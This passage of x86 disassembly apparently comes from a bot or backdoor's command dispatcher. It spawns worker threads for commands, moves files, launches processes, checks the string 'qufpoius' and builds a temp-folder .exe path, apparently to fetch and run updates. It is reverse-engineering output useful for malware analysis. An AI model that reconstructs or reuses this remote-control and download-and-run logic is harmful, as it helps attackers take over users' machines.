push [ebp+arg_10]
call sub_41B779
imul eax, 234h
pop ecx
push dword_43E59C[eax]
call sub_409A73
push [ebp+arg_10]
call sub_41B779
imul eax, 234h
add esp, 18h
cmp byte ptr dword_43E390[eax], 73h
jnz loc_409855
push esi
push [ebp+arg_10]
call sub_41B779
imul eax, 234h
pop ecx
add eax, offset byte_43E5A8
push eax
push edi
push offset aSSS_2 ; "[%s] * %s %s"
jmp loc_407A36
; ---------------------------------------------------------------------------
loc_40795E: ; CODE XREF: sub_401ACD+4F00�j
; sub_401ACD+4F17�j
push [ebp+arg_10]
call sub_41B779
imul eax, 234h
pop ecx
cmp byte_43E5A8[eax], bl
jz loc_409855
cmp [ebp+var_C], ebx
jz loc_409855
push edi
call sub_41AFE0
push [ebp+arg_10]
mov esi, eax
call sub_41AFE0
push [ebp+arg_8]
add esi, eax
call sub_41AFE0
add eax, [ebp+var_C]
push [ebp+arg_0]
lea eax, [eax+esi+2]
push eax
call sub_41B900
mov esi, eax
add esp, 14h
cmp esi, ebx
jz loc_409855
push [ebp+arg_10]
call sub_41B779
test eax, eax
pop ecx
jle loc_409855
push [ebp+arg_10]
call sub_41B779
cmp eax, 400h
pop ecx
jge loc_409855
push ebx
push ebx
push esi
push edi
push [ebp+arg_10]
call sub_41B779
imul eax, 234h
pop ecx
push dword_43E59C[eax]
call sub_409A73
push [ebp+arg_10]
call sub_41B779
imul eax, 234h
add esp, 18h
cmp byte ptr dword_43E390[eax], 73h
jnz loc_409855
push esi
push [ebp+arg_10]
call sub_41B779
imul eax, 234h
pop ecx
add eax, offset byte_43E5A8
push eax
push edi
push offset aSSS_1 ; "[%s] <%s> %s"
loc_407A36: ; CODE XREF: sub_401ACD+5E8C�j
lea eax, [ebp+var_2C4]
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
add esp, 28h
jmp loc_409855
; ---------------------------------------------------------------------------
loc_407A63: ; CODE XREF: sub_401ACD+4ED2�j
; sub_401ACD+4EE9�j
push [ebp+arg_10]
call ds:dword_4CB694 ; inet_addr
push edi
mov [ebp+var_680], eax
call sub_41B779
push [ebp+arg_0]
mov [ebp+var_690], eax
call sub_41B779
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_88]
mov [ebp+var_688], eax
lea eax, [ebp+var_710]
mov [ebp+var_714], esi
push eax
call sub_41B5F0
add esp, 14h
mov edi, [ebp+var_4]
mov eax, [ebp+var_8]
mov [ebp+var_678], edi
push [ebp+var_688]
mov [ebp+var_674], eax
push [ebp+var_690]
push [ebp+var_680]
call ds:dword_4CB6E0 ; inet_ntoa
push eax
lea eax, [ebp+var_2C4]
push offset unk_42AAE4
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 0Bh
push eax
call sub_40B0F7
add esp, 20h
mov [ebp+var_684], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_714]
push ebx
push eax
push offset sub_40C669
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_684]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_407B45
loc_407B2F: ; CODE XREF: sub_401ACD+6076�j
cmp [ebp+var_670], ebx
jnz loc_403DA1
push 32h
call dword_427078 ; Sleep
jmp short loc_407B2F
; ---------------------------------------------------------------------------
loc_407B45: ; CODE XREF: sub_401ACD+6060�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42ABD8
jmp loc_403D92
; ---------------------------------------------------------------------------
loc_407B56: ; CODE XREF: sub_401ACD+4EA4�j
; sub_401ACD+4EBB�j
push [ebp+arg_10]
call sub_41B779
mov [ebp+var_112C], eax
push 7Fh
lea eax, [ebp+var_1230]
push edi
push eax
call sub_41B5F0
push [ebp+arg_0]
call sub_41B779
mov esi, [ebp+arg_4]
add esp, 14h
mov [ebp+var_1130], eax
lea eax, [ebp+var_11B0]
push [ebp+var_88]
mov [ebp+var_1238], esi
push 80h
push eax
call sub_41B980
mov eax, [ebp+var_8]
add esp, 0Ch
mov edi, [ebp+var_4]
mov [ebp+var_111C], eax
push [ebp+var_1130]
lea eax, [ebp+var_1230]
mov [ebp+var_1120], edi
push eax
push [ebp+var_112C]
push esi
call sub_40AC10
pop ecx
push eax
lea eax, [ebp+var_2C4]
push offset unk_42AAA8
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 18h
push eax
call sub_40B0F7
add esp, 24h
mov [ebp+var_1128], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1238]
push ebx
push eax
push offset sub_4103AB
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_1128]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_407C42
loc_407C2C: ; CODE XREF: sub_401ACD+6173�j
cmp [ebp+var_1118], ebx
jnz loc_403DA1
push 32h
call dword_427078 ; Sleep
jmp short loc_407C2C
; ---------------------------------------------------------------------------
loc_407C42: ; CODE XREF: sub_401ACD+615D�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42AA64
jmp loc_403D92
; ---------------------------------------------------------------------------
loc_407C53: ; CODE XREF: sub_401ACD+4E76�j
; sub_401ACD+4E8D�j
push 0FFh
lea eax, [ebp+var_2878]
push [ebp+arg_10]
push eax
call sub_41B5F0
push 0FFh
lea eax, [ebp+var_2778]
push edi
push eax
call sub_41B5F0
push [ebp+arg_0]
mov [ebp+var_2674], ebx
call sub_41B779
mov [ebp+var_2670], eax
mov eax, [ebp+esi+var_80]
add esp, 1Ch
cmp eax, ebx
jz short loc_407CAC
push 10h
push ebx
push eax
call sub_41BDC5
add esp, 0Ch
mov [ebp+var_2668], eax
jmp short loc_407CB2
; ---------------------------------------------------------------------------
loc_407CAC: ; CODE XREF: sub_401ACD+61C9�j
mov [ebp+var_2668], ebx
loc_407CB2: ; CODE XREF: sub_401ACD+61DD�j
mov esi, [ebp+esi+var_7C]
cmp esi, ebx
jz short loc_407CC9
push esi
call sub_41B779
pop ecx
mov [ebp+var_266C], eax
jmp short loc_407CCF
; ---------------------------------------------------------------------------
loc_407CC9: ; CODE XREF: sub_401ACD+61EB�j
mov [ebp+var_266C], ebx
loc_407CCF: ; CODE XREF: sub_401ACD+61FA�j
movzx eax, [ebp+var_8FB]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_88]
mov [ebp+var_2664], eax
lea eax, [ebp+var_28F8]
mov [ebp+var_28FC], esi
push eax
call sub_41B5F0
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_265C], eax
mov eax, [ebp+var_8]
push edi
mov [ebp+var_2660], eax
push [ebp+arg_10]
lea eax, [ebp+var_2C4]
push offset unk_42AA38
push eax
call sub_41B886
push esi
lea eax, [ebp+var_2C4]
push 1Dh
push eax
call sub_40B0F7
add esp, 1Ch
mov [ebp+var_2678], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_28FC]
push ebx
push eax
push offset sub_4163FA
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_2678]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_407D80
loc_407D6A: ; CODE XREF: sub_401ACD+62B1�j
cmp [ebp+var_2658], ebx
jnz loc_407279
push 32h
call dword_427078 ; Sleep
jmp short loc_407D6A
; ---------------------------------------------------------------------------
loc_407D80: ; CODE XREF: sub_401ACD+629B�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42A9F8
jmp loc_40726A
; ---------------------------------------------------------------------------
loc_407D91: ; CODE XREF: sub_401ACD+4E48�j
; sub_401ACD+4E5F�j
push 7Fh
lea eax, [ebp+var_3490]
pop esi
push esi
push [ebp+arg_10]
push eax
call sub_41B5F0
push esi
lea eax, [ebp+var_3410]
push edi
push eax
call sub_41B5F0
push esi
lea eax, [ebp+var_3390]
push [ebp+arg_0]
push eax
call sub_41B5F0
push esi
lea eax, [ebp+var_3310]
push [ebp+var_88]
push eax
call sub_41B5F0
mov eax, [ebp+var_4]
add esp, 30h
mov esi, [ebp+arg_4]
mov [ebp+var_328C], eax
push [ebp+arg_0]
mov eax, [ebp+var_8]
mov [ebp+var_3288], eax
lea eax, [ebp+var_2C4]
push edi
mov [ebp+var_3494], esi
push [ebp+arg_10]
push offset unk_42A9BC
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 12h
push eax
call sub_40B0F7
add esp, 20h
mov [ebp+var_3290], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3494]
push ebx
push eax
push offset sub_414A92
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_3290]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_407E68
loc_407E52: ; CODE XREF: sub_401ACD+6399�j
cmp [ebp+var_3284], ebx
jnz loc_407279
push 32h
call dword_427078 ; Sleep
jmp short loc_407E52
; ---------------------------------------------------------------------------
loc_407E68: ; CODE XREF: sub_401ACD+6383�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42A984
jmp loc_40726A
; ---------------------------------------------------------------------------
loc_407E79: ; CODE XREF: sub_401ACD+4D1B�j
; sub_401ACD+4D32�j
push 7Fh
lea eax, [ebp+var_3068]
pop esi
push esi
push [ebp+arg_10]
push eax
call sub_41B5F0
push esi
lea eax, [ebp+var_2FE8]
push edi
push eax
call sub_41B5F0
push esi
lea eax, [ebp+var_2F68]
push [ebp+arg_0]
push eax
call sub_41B5F0
push esi
lea eax, [ebp+var_2EE8]
push [ebp+var_88]
push eax
call sub_41B5F0
mov eax, [ebp+var_4]
add esp, 30h
mov esi, [ebp+arg_4]
mov [ebp+var_2E64], eax
push [ebp+arg_0]
mov eax, [ebp+var_8]
mov [ebp+var_2E60], eax
lea eax, [ebp+var_2C4]
push edi
mov [ebp+var_306C], esi
push [ebp+arg_10]
push offset unk_42A954
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 0Eh
push eax
call sub_40B0F7
add esp, 20h
mov [ebp+var_2E68], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_306C]
push ebx
push eax
push offset sub_4137CD
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_2E68]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_407F50
loc_407F3A: ; CODE XREF: sub_401ACD+6481�j
cmp [ebp+var_2E5C], ebx
jnz loc_407279
push 32h
call dword_427078 ; Sleep
jmp short loc_407F3A
; ---------------------------------------------------------------------------
loc_407F50: ; CODE XREF: sub_401ACD+646B�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42A91C
jmp loc_40726A
; ---------------------------------------------------------------------------
loc_407F61: ; CODE XREF: sub_401ACD+4BF2�j
; sub_401ACD+4C09�j ...
push 7Fh
lea eax, [ebp+var_3CE4]
pop esi
push esi
push [ebp+arg_10]
push eax
call sub_41B5F0
push esi
lea eax, [ebp+var_3C64]
push edi
push eax
call sub_41B5F0
push esi
lea eax, [ebp+var_3BE4]
push [ebp+arg_0]
push eax
call sub_41B5F0
push esi
lea eax, [ebp+var_3B64]
push [ebp+var_88]
push eax
call sub_41B5F0
push 20h
lea eax, [ebp+var_3AE4]
push [ebp+arg_8]
push eax
call sub_41B5F0
mov eax, [ebp+var_4]
add esp, 3Ch
mov esi, [ebp+arg_4]
mov [ebp+var_3A64], eax
push [ebp+arg_0]
mov eax, [ebp+var_8]
mov [ebp+var_3A60], eax
lea eax, [ebp+var_2C4]
push edi
mov [ebp+var_3CEC], esi
push [ebp+arg_10]
push offset unk_42A8EC
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 0Dh
push eax
call sub_40B0F7
add esp, 20h
mov [ebp+var_3CE8], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3CEC]
push ebx
push eax
push offset sub_412A54
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_3CE8]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_408049
loc_408033: ; CODE XREF: sub_401ACD+657A�j
cmp [ebp+var_3A5C], ebx
jnz loc_407279
push 32h
call dword_427078 ; Sleep
jmp short loc_408033
; ---------------------------------------------------------------------------
loc_408049: ; CODE XREF: sub_401ACD+6564�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42A8B4
jmp loc_40726A
; ---------------------------------------------------------------------------
loc_40805A: ; CODE XREF: sub_401ACD+4BC4�j
; sub_401ACD+4BDB�j
push 7Fh
lea eax, [ebp+var_1778]
push [ebp+arg_10]
push eax
call sub_41B5F0
push edi
call sub_41B779
push 3Fh
mov [ebp+var_1628], eax
push [ebp+arg_0]
lea eax, [ebp+var_16F8]
push eax
call sub_41B5F0
mov esi, [ebp+esi+var_80]
add esp, 1Ch
cmp esi, ebx
jz short loc_4080A5
push 3Fh
lea eax, [ebp+var_16B8]
push esi
push eax
call sub_41B5F0
add esp, 0Ch
loc_4080A5: ; CODE XREF: sub_401ACD+65C4�j
lea eax, [ebp+var_16F8]
mov [ebp+var_1624], 1
push eax
lea eax, [ebp+var_1778]
push [ebp+var_1628]
push eax
lea eax, [ebp+var_2C4]
push offset dword_42A884
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 1Fh
push eax
call sub_40B0F7
add esp, 20h
mov [ebp+var_1620], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_177C]
push ebx
push eax
push offset sub_4017ED
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_1620]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_408131
loc_40811B: ; CODE XREF: sub_401ACD+6662�j
cmp [ebp+var_161C], ebx
jnz loc_406CDF
push 32h
call dword_427078 ; Sleep
jmp short loc_40811B
; ---------------------------------------------------------------------------
loc_408131: ; CODE XREF: sub_401ACD+664C�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset dword_42A848
jmp loc_406CD0
; ---------------------------------------------------------------------------
loc_408142: ; CODE XREF: sub_401ACD+4B84�j
; sub_401ACD+4B9B�j
push edi
call sub_41B779
cmp eax, ebx
pop ecx
mov [ebp+var_1D64], eax
jle loc_408235
push [ebp+arg_10]
mov esi, 80h
lea eax, [ebp+var_1EEC]
push esi
push eax
call sub_41B980
add esp, 0Ch
xor eax, eax
cmp [ebp+var_8EE], bl
push [ebp+var_88]
setnz al
mov [ebp+var_1D60], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1EF0], eax
lea eax, [ebp+var_1DEC]
push esi
push eax
call sub_41B980
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_1D5C], eax
mov eax, [ebp+var_8]
push edi
mov [ebp+var_1D58], eax
push [ebp+arg_10]
lea eax, [ebp+var_2C4]
push offset unk_42A81C
push 200h
push eax
call sub_41B980
push ebx
lea eax, [ebp+var_2C4]
push 15h
push eax
call sub_40B0F7
add esp, 20h
mov [ebp+var_1D6C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1EF0]
push ebx
push eax
push offset sub_412E9E
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_1D6C]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_408224
loc_408212: ; CODE XREF: sub_401ACD+6755�j
cmp [ebp+var_1D54], ebx
jnz short loc_40828C
push 32h
call dword_427078 ; Sleep
jmp short loc_408212
; ---------------------------------------------------------------------------
loc_408224: ; CODE XREF: sub_401ACD+6743�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42A7E4
jmp loc_4049EC
; ---------------------------------------------------------------------------
loc_408235: ; CODE XREF: sub_401ACD+6684�j
push offset unk_42A7AC
jmp loc_406F05
; ---------------------------------------------------------------------------
loc_40823F: ; CODE XREF: sub_401ACD+4B56�j
; sub_401ACD+4B6D�j
push edi
push [ebp+arg_10]
call dword_4270B4 ; MoveFileA
test eax, eax
jz short loc_40826C
push edi
lea eax, [ebp+var_2C4]
push [ebp+arg_10]
push offset unk_42A788
push 200h
push eax
call sub_41B980
add esp, 14h
jmp short loc_40828C
; ---------------------------------------------------------------------------
loc_40826C: ; CODE XREF: sub_401ACD+677E�j
push offset dword_42A77C
call sub_41814D
pop ecx
push eax
lea eax, [ebp+var_2C4]
push 200h
push eax
call sub_41B980
loc_408289: ; CODE XREF: sub_401ACD+2F2B�j
; sub_401ACD+5570�j
add esp, 0Ch
loc_40828C: ; CODE XREF: sub_401ACD+2137�j
; sub_401ACD+2ECD�j ...
cmp [ebp+var_8], ebx
jnz loc_4083BD
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
loc_4082A9: ; CODE XREF: sub_401ACD+57C7�j
call sub_409A73
add esp, 14h
jmp loc_4083BD
; ---------------------------------------------------------------------------
loc_4082B6: ; CODE XREF: sub_401ACD+4B28�j
; sub_401ACD+4B3F�j
push [ebp+arg_10]
lea eax, [ebp+var_3F04]
push 104h
push eax
call sub_41B980
add esp, 0Ch
cmp [ebp+var_C], ebx
jz short loc_4082F0
push edi
push [ebp+var_C]
call sub_41B900
pop ecx
cmp eax, ebx
pop ecx
jz short loc_4082F0
push eax
lea eax, [ebp+var_3E00]
push eax
call sub_41B886
pop ecx
pop ecx
loc_4082F0: ; CODE XREF: sub_401ACD+6803�j
; sub_401ACD+6812�j
push [ebp+var_88]
lea eax, [ebp+var_3F84]
push 80h
push eax
call sub_41B980
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_3F88], eax
mov eax, [ebp+var_4]
mov [ebp+var_3CF8], eax
mov eax, [ebp+var_8]
mov [ebp+var_3CF4], eax
lea eax, [ebp+var_3E00]
push eax
lea eax, [ebp+var_3F04]
push eax
push offset unk_42A74C
lea eax, [ebp+var_2C4]
push 200h
push eax
call sub_41B980
push ebx
lea eax, [ebp+var_2C4]
push 24h
push eax
call sub_40B0F7
add esp, 20h
mov [ebp+var_3CFC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3F88]
push ebx
push eax
push offset sub_416CAE
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_3CFC]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_4083A2
loc_408390: ; CODE XREF: sub_401ACD+68D3�j
cmp [ebp+var_3CF0], ebx
jnz short loc_4083BD
push 32h
call dword_427078 ; Sleep
jmp short loc_408390
; ---------------------------------------------------------------------------
loc_4083A2: ; CODE XREF: sub_401ACD+68C1�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42A710
loc_4083AE: ; CODE XREF: sub_401ACD+925�j
; sub_401ACD+A63�j ...
lea eax, [ebp+var_2C4]
push eax
call sub_41B886
add esp, 0Ch
loc_4083BD: ; CODE XREF: sub_401ACD+7E1�j
; sub_401ACD+94C�j ...
push 1
pop esi
jmp loc_406D03
; ---------------------------------------------------------------------------
loc_4083C5: ; CODE XREF: sub_401ACD+4AFA�j
; sub_401ACD+4B11�j
push 44h
lea eax, [ebp+var_668]
pop esi
push esi
push ebx
push eax
call sub_41B590
push 1
mov [ebp+var_668], esi
pop esi
mov [ebp+var_638], bx
push [ebp+arg_10]
mov [ebp+var_63C], esi
call sub_41B779
add esp, 10h
cmp eax, esi
jnz short loc_408404
mov [ebp+var_638], 5
loc_408404: ; CODE XREF: sub_401ACD+692C�j
cmp [ebp+var_C], ebx
jz loc_406CDF
push edi
push [ebp+var_C]
call sub_41B900
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz loc_406CDF
lea eax, [ebp+var_E10]
push eax
lea eax, [ebp+var_668]
push eax
push ebx
push ebx
push 28h
push esi
push ebx
push ebx
push edi
push ebx
call dword_42706C ; CreateProcessA
test eax, eax
jnz short loc_40844D
push offset unk_42A6EC
jmp loc_4085D6
; ---------------------------------------------------------------------------
loc_40844D: ; CODE XREF: sub_401ACD+6974�j
push edi
push offset dword_42A6D0
jmp loc_406CD0
; ---------------------------------------------------------------------------
loc_408458: ; CODE XREF: sub_401ACD+4ACC�j
; sub_401ACD+4AE3�j
push edi
push offset aQufpoius ; "qufpoius"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4085D1
lea eax, [ebp+var_48F0]
push eax
push 104h
call dword_4270B0 ; GetTempPathA
push 0FFh
lea eax, [ebp+var_25D0]
push [ebp+arg_10]
push eax
call sub_41B5F0
lea eax, [ebp+var_17D0]
push eax
call sub_40AD81
add esp, 10h
push eax
lea eax, [ebp+var_48F0]
push eax
lea eax, [ebp+var_24D0]
push offset aSS_exe ; "%s%s.exe"
push eax
call sub_41B886
mov eax, [ebp+esi+var_84]
add esp, 10h
cmp eax, ebx
mov [ebp+var_23CC], 1
mov [ebp+var_23C8], ebx
jz short loc_4084ED
push 10h
push ebx
push eax
call sub_41BDC5
add esp, 0Ch
mov [ebp+var_23C0], eax
jmp short loc_4084F3
; ---------------------------------------------------------------------------
loc_4084ED: ; CODE XREF: sub_401ACD+6A0A�j
mov [ebp+var_23C0], ebx
loc_4084F3: ; CODE XREF: sub_401ACD+6A1E�j
mov esi, [ebp+esi+var_80]
cmp esi, ebx
jz short loc_40850A
push esi
call sub_41B779
pop ecx
mov [ebp+var_23C4], eax
jmp short loc_408510
; ---------------------------------------------------------------------------
loc_40850A: ; CODE XREF: sub_401ACD+6A2C�j
mov [ebp+var_23C4], ebx
loc_408510: ; CODE XREF: sub_401ACD+6A3B�j
movzx eax, [ebp+var_8FB]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_88]
mov [ebp+var_23BC], eax
lea eax, [ebp+var_2650]
mov [ebp+var_2654], esi
push eax
call sub_41B5F0
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_23B4], eax
mov eax, [ebp+var_8]
push [ebp+arg_10]
mov [ebp+var_23B8], eax
lea eax, [ebp+var_2C4]
push offset dword_42A698
push eax
call sub_41B886
push esi
lea eax, [ebp+var_2C4]
push 1Eh
push eax
call sub_40B0F7
add esp, 18h
mov [ebp+var_23D0], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2654]
push ebx
push eax
push offset sub_4163FA
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_23D0]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_4085C0
loc_4085AA: ; CODE XREF: sub_401ACD+6AF1�j
cmp [ebp+var_23B0], ebx
jnz loc_406CDF
push 32h
call dword_427078 ; Sleep
jmp short loc_4085AA
; ---------------------------------------------------------------------------
loc_4085C0: ; CODE XREF: sub_401ACD+6ADB�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset dword_42A65C
jmp loc_406CD0
; ---------------------------------------------------------------------------
loc_4085D1: ; CODE XREF: sub_401ACD+699A�j
push offset dword_42A614
loc_4085D6: ; CODE XREF: sub_401ACD+2E74�j
; sub_401ACD+457D�j ...
lea eax, [ebp+var_2C4]
push eax
call sub_41B886
pop ecx
pop ecx
jmp loc_406CDF
; ---------------------------------------------------------------------------
loc_4085E9: ; CODE XREF: sub_401ACD+4A9E�j
; sub_401ACD+4AB5�j
push [ebp+var_8C]
push offset dword_42D02C
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_401E94
cmp [ebp+var_C], ebx
jz loc_401E94
push edi
push [ebp+var_C]
call sub_41B900
pop ecx
pop ecx
push eax
lea eax, [ebp+var_2C4]
push [ebp+var_88]
push [ebp+var_8C]
push [ebp+var_90]
push offset dword_42A604
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push 1FFh
push eax
push [ebp+arg_0]
call sub_41B5F0
push [ebp+arg_10]
call sub_41B779
add esp, 28h
test eax, eax
jle short loc_408674
push [ebp+arg_10]
call sub_41B779
imul eax, 3E8h
pop ecx
push eax
call dword_427078 ; Sleep
loc_408674: ; CODE XREF: sub_401ACD+6B8F�j
push offset dword_42A5F0
call sub_4151AD
mov eax, [ebp+arg_24]
pop ecx
inc eax
jmp loc_401E97
; ---------------------------------------------------------------------------
loc_408688: ; CODE XREF: sub_401ACD+4A70�j
; sub_401ACD+4A87�j
push [ebp+var_8C]
push offset dword_42D02C
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_401E94
cmp [ebp+var_C], ebx
jz loc_409855
push edi
push [ebp+var_C]
call sub_41B900
inc edi
push offset aRepeat ; "repeat"
push edi
mov esi, eax
call sub_41C070
add esp, 10h
test eax, eax
push esi
jz short loc_408746
push [ebp+var_88]
lea eax, [ebp+var_2C4]
push [ebp+var_8C]
push [ebp+var_90]
push offset dword_42A604
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push 1FFh
push eax
push [ebp+arg_0]
call sub_41B5F0
add esp, 24h
lea eax, [ebp+var_2C4]
push esi
push offset dword_42A5D8
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_4151AD
push [ebp+arg_10]
call sub_41B779
add esp, 14h
test eax, eax
jle loc_409855
push [ebp+arg_10]
call sub_41B779
add eax, [ebp+arg_24]
pop ecx
jmp loc_401E97
; ---------------------------------------------------------------------------
loc_408746: ; CODE XREF: sub_401ACD+6BFB�j
push offset unk_42A5A4
loc_40874B: ; CODE XREF: sub_401ACD+7543�j
lea eax, [ebp+var_2C4]
push eax
call sub_41B886
add esp, 0Ch
loc_40875A: ; CODE XREF: sub_401ACD+74CB�j
; sub_401ACD+7624�j
cmp [ebp+var_8], ebx
jnz short loc_40877B
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
add esp, 14h
loc_40877B: ; CODE XREF: sub_401ACD+6C90�j
; sub_401ACD+72C8�j ...
lea eax, [ebp+var_2C4]
push eax
call sub_4151AD
jmp loc_409854
; ---------------------------------------------------------------------------
loc_40878C: ; CODE XREF: sub_401ACD+4A42�j
; sub_401ACD+4A59�j
push 7Fh
lea eax, [ebp+var_2214]
push [ebp+arg_10]
push eax
call sub_41B5F0
push 7Fh
lea eax, [ebp+var_2194]
push edi
push eax
call sub_41B5F0
push 7Fh
lea eax, [ebp+var_2114]
push [ebp+var_88]
push eax
call sub_41B5F0
mov eax, [ebp+var_4]
add esp, 24h
mov esi, [ebp+arg_4]
mov [ebp+var_2090], eax
mov eax, [ebp+var_8]
push edi
push [ebp+arg_10]
mov [ebp+var_208C], eax
lea eax, [ebp+var_2C4]
mov [ebp+var_2218], esi
push offset unk_42A570
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 0Fh
push eax
call sub_40B0F7
add esp, 1Ch
mov [ebp+var_2094], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2218]
push ebx
push eax
push offset sub_4143CC
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_2094]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_40884C
loc_40883A: ; CODE XREF: sub_401ACD+6D7D�j
cmp [ebp+var_2088], ebx
jnz short loc_408867
push 32h
call dword_427078 ; Sleep
jmp short loc_40883A
; ---------------------------------------------------------------------------
loc_40884C: ; CODE XREF: sub_401ACD+6D6B�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42A534
loc_408858: ; CODE XREF: sub_401ACD+6E8A�j
lea eax, [ebp+var_2C4]
push eax
call sub_41B886
add esp, 0Ch
loc_408867: ; CODE XREF: sub_401ACD+6D73�j
; sub_401ACD+6E6E�j
cmp [ebp+var_8], ebx
jnz loc_409631
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push esi
jmp loc_409629
; ---------------------------------------------------------------------------
loc_408887: ; CODE XREF: sub_401ACD+4A14�j
; sub_401ACD+4A2B�j
push 7Fh
lea eax, [ebp+var_23A8]
push [ebp+arg_10]
push eax
call sub_41B5F0
push 7Fh
lea eax, [ebp+var_2328]
push edi
push eax
call sub_41B5F0
push 7Fh
lea eax, [ebp+var_22A8]
push [ebp+var_88]
push eax
call sub_41B5F0
mov eax, [ebp+var_4]
add esp, 24h
mov esi, [ebp+arg_4]
mov [ebp+var_2224], eax
mov eax, [ebp+var_8]
push edi
push [ebp+arg_10]
mov [ebp+var_2220], eax
lea eax, [ebp+var_2C4]
mov [ebp+var_23AC], esi
push offset dword_42A508
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 11h
push eax
call sub_40B0F7
add esp, 1Ch
mov [ebp+var_2228], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_23AC]
push ebx
push eax
push offset sub_413B78
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_2228]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_40894B
loc_408935: ; CODE XREF: sub_401ACD+6E7C�j
cmp [ebp+var_221C], ebx
jnz loc_408867
push 32h
call dword_427078 ; Sleep
jmp short loc_408935
; ---------------------------------------------------------------------------
loc_40894B: ; CODE XREF: sub_401ACD+6E66�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset dword_42A4CC
jmp loc_408858
; ---------------------------------------------------------------------------
loc_40895C: ; CODE XREF: sub_401ACD+49E6�j
; sub_401ACD+49FD�j
push edi
lea eax, [ebp+var_2C4]
push offset dword_42A4C4
push eax
call sub_41B886
push [ebp+arg_10]
call sub_41B779
add esp, 10h
loc_408979: ; CODE XREF: sub_401ACD+6F17�j
test eax, eax
jle loc_409855
push [ebp+arg_10]
call sub_41B779
